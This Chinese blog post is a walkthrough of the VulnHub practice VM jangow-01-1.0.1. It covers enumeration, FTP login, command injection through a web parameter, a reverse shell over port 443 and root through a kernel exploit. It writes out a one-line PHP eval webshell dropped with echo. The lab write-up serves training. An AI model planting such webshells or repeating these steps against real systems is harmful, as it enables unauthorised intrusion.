jangow-01-1.0.1靶机复盘

最新推荐文章于 2024-07-19 11:44:44 发布
最新推荐文章于 2024-07-19 11:44:44 发布
阅读量122 收藏
点赞数
分类专栏: 打靶机系列 文章标签: linux web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44681307/article/details/131624109
版权

jangow-01-1.0.1靶机复盘

jangow-01-1.0.1靶机下载地址:https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova

iptables -t filter -A INPUT -p icmp -j DROP 只要是ping的命令全部drop掉,就是禁止自己的主机被ping。

iptables -L 查看防火墙规则

iptables -F 清除全部规则

为什么要说防火墙,后来才发现这个靶机设置了防火墙,只有允许的端口允许的命令才可以用,其他的都不能用,包括端口也只有443端口被允许通过。

教程开始

这个靶机打开后是直接带ip的,不用扫描。

用nmap扫描后发现开启了两个端口,一个ftp一个http,端口号没改。

image-20230628164500187

dirsearch -u http://10.9.136.146/ 扫描一下目录,发现一个隐藏目录

image-20230628161800403

进入后发现有账号密码,因为只开启了ftp,所以尝试用ftp登陆一下。

image-20230628164422141

不出意外ftp登陆成功了

ftp 10.9.136.146

image-20230628164744324

搜了一圈发现有两个php文件挺可疑,就发送到自己电脑上了,实际后面没啥用,ftp也没啥用。

image-20230628165154812

在主界面右面有一个Buscar,进去后发现什么都没有

image-20230628195821186

在网址后面随便输入ls命令,发现可以用,经过尝试发现这里可以注入代码,但是有一些命令被禁用了,比如nc

image-20230628195852789

发现echo命令没有被禁用,就准备写一个php命令输出到一个文件。

echo '<?php echo "666";eval($_POST["aaa"]); ?>' >aaa.php

image-20230628190121665

测试后发现是可以的,代码不见了,说明被执行了

image-20230628190319948

然后我们利用中国蚁剑连接一下,不得不说这个工具太好用了。

image-20230628190224365

因为nc -e不能用,所以就在网上找了个反弹shell的命令,这里要注意的是只有443端口能用,别的端口都不能用。

image-20230628192114291

image-20230628192125337

拿到shell后就想着怎么提权,但是命令几乎都被禁用了,所以就准备从内核漏洞出手。

查看系统和内核版本。

uname -a
cat /etc/os-release

image-20230628193954191

在kali上搜索内核漏洞文件,发现有一个满足条件的。

image-20230628194322869

因为wget命令也被禁用了,所以不能直接用wget传到靶机上,就用中国蚁剑上传到了靶机。

image-20230628194529869

make命令也被禁用了,所以就用gcc编译文件。执行后成功拿到root权限。

image-20230628194847625

dumplings。
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
jangow-01-1.0.1
01-19
vulnhub的靶机jangow-01-1.0.1 Description Difficulty: easy The secret to this box is enumeration! Inquiries jangow2021@gmail.com This works better with VirtualBox rather than VMware ## Changelog 2021-...
vulnhub——jangow-01-1.0.1靶机
Re1_zf的博客
10-28 1095
我这里/出不来,所以采用的方式就是先cd到根目录,再cd到interfaces文件的目录,在当前目录使用vi修改文件内容。修改完成后按F10或ctrl+x启动(如果没有进入下面的界面,按F10或ctrl+x的时候同步按回车)修改网卡为自己的网卡(这里的自己的网卡不是本机的网卡,而是上面ifconfig -a出来的靶机的网卡)但是在蚁剑的虚拟终端执行后是没有反应的,必须使用反弹的交互式shell。但是加权限执行后没用,看了一下发现大小为0,传输的有问题应该。这里可以简单操作,但是使用这个虚拟终端无法提权。
渗透测试Jangow1.0.1--入门级
G208_522的博客
03-25 5670
渗透测试Jangow101(一) 一、环境搭建 1、靶机:ip:192.168.0.9 靶机下载:https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova 2、攻击机:ip:192.168.0.11 3、如何搭建 下载后的文件直接右键打开方式,选择virtualbox(介意使用virtualbox) 使用virtualbox打开后会显示靶机ip 二、信息收集 1、nmap扫描开放端口 nmap -sC -sV 192.168.0.9 -sV 扫描目
【Vulnhub靶场】JANGOW: 1.0.1
DG_s1mple
01-21 2729
时隔这么久,终于开始做题了 环境准备 下载靶机,导入到virtualBox里面,这应该不用教了吧 开机可以看到,他已经给出了靶机的IP地址,就不用我们自己去探测了 攻击机IP地址为:192.168.2.14 靶机IP地址为:192.168.2.16 渗透过程 信息收集 万事第一步,先扫描 可以看到,靶机目前就只开放了两个端口,一个是21一个是80,首先访问80端口 发现是有网页的,随便点点,看看有没有能注入或者渗透的点 发现点到Buscar时,页面变得不一样,并且网址出现了可疑的后缀 我们试着运行一
靶机练习 No.20 Vulnhub靶机 jangow 01 ftp登录 命令执行写入webshell php反弹shell 45010.c内核漏洞提权
YouthBelief的博客
01-20 3075
0x00 环境准备 下载链接 https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova 靶机介绍 难度:简单 上架时间:2021年11月4日 提示信息:The secret to this box is enumeration! Inquiries jangow2021@gmail.com 靶机配置 virtual box 启动,与kali配置同一网卡。 0x01 信息收集 靶机ip探测 端口服务识别 21/tcp ope
rocketmq-console-ng-1.0.1.jar
07-22
java -jar rocketmq-console-ng-1.0.1.jar 启动 ---当终端断了该服务就会停止 nohup java -jar rocketmq-console-ng-1.0.1.jar >>/soft/RocketMQ/rocketmqlogs/log.out 2>&1 & 后台启动 --当终端断了也不会停止服务
我的世界光影SEUS-Renewed-v1.0.1.zip
05-16
"SEUS-Renewed-v1.0.1.zip" 是一款专为《我的世界》设计的光影包,它基于经典的SEUS光影进行改进和优化,旨在提供更加美观、真实的视觉享受。 SEUS光影最初由Creeperman86开发,因其独特的视觉风格和高质量的光影...
vulnhub靶机-JANGOW: 1.0.1
臭nana的博客
03-08 4303
Description Back to the Top Difficulty: easy The secret to this box is enumeration! Inquiries jangow2021@gmail.com This works better with VirtualBox rather than VMware ## Changelog 2021-11-04 - v1.0.1 2021-11-01 - v1.0.0 1、开机(virtualbox)直接得到靶机ip:192.16.
vulnhub 靶机 Jangow: 1.0.1
qq_44029310的博客
06-11 2899
一次打靶记录。
VulnHub-Jangow-01-1.0.1打靶记录
qq_43534481的博客
08-21 539
Vulnhub 靶场 jangow打靶记录
LINUX:懒汉单例模式线程池
W2155的博客
07-16 485
创建一个线程,就是要这个线程去完成某种任务的。池化技术就是,提前创建一批线程,有任务这一批线程就会执行。而不是有任务的时候在去创建线程。池化技术有着更高的效率,因为线程都是提前创建好的,直接执行任务。
Linux中的环境变量
qhy850716的博客
07-17 442
我们思考这样一个问题:指令也是可执行程序,我们写好的编译好的c语言也是程序,为什么我们在执行c语言程序时要./a.out带上当前路径,而ls这种指令就不要带路径呢?这就是环境变量PATH的作用,Linux中存在一些全局设置,表明命令行解释器应该去哪个路径下寻找可执行程序。系统中的很多配置在我们登录Linux时就已经被加载到bash中了,也就是内存。
Qmi8658a姿态传感器使用心得(2)linux
最新发布
Starry的博客
07-19 952
COD 原理,CTRL9,自检(详细代码示例)
【Linux杂货铺】期末总结篇4:shell编程
聆风吟的博客
07-17 4280
本文主要分享作者本人期末习的总结,欢迎大家借鉴浏览。
linux centos nginx 报错 client intended to send too large body: 104853014 bytes问题
qq_42250832的博客
07-17 341
这个错误通常发生在Web服务器处理HTTP请求时,当客户端尝试发送的请求体(body)大小超过了服务器配置的限制时。错误信息 “client intended to send too large body: 104853014 bytes” 表示客户端想要发送的数据量超过了100MB,这通常是由于客户端尝试上传一个非常大的文件或者提交了一个非常大的表单。增加服务器接收请求体的大小限制。这通常可以通过配置文件来实现,例如,如果你使用的是Nginx,可以修改client_max_body_size指令。
Linux 权限
includemainprinf的博客
07-18 632
在Linux操作系统中,权限管理是一个至关重要的概念,它确保了系统的安全性和稳定性。同时可以在工作中,设置对象的权限,就算我们很多人使用一台服务器,我们也可以让别人看不到我们文件的内容,或者让别人无法对自己的文件进行操作!
文件在Linux下为binary格式在Windows下为utf-8格式
qq_38220334的博客
07-17 346
想着是不是之前遇到的问题,有可能是文件中含有特殊字符,然后用vim命令来编辑这个文件,发现,还真是含有一个特殊字符,然后将它删除掉,文件就变成utf-8格式的文件了。在Windows下和Mac下都是没有问题的,在华为云服务器上也是没问题的(操作系统不是centos),但是在自己搭建的Linux服务器(centos)上是有问题的。用shell或者Python脚本去将这个文件转为utf-8格式的,但是都失败了。
Linux(CentOS7)部署PHP-7.2.17源码包
thetender的博客
07-18 1044
LAMP系统安装 通过PHP的源码包部署PHP-7.2.17版本
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值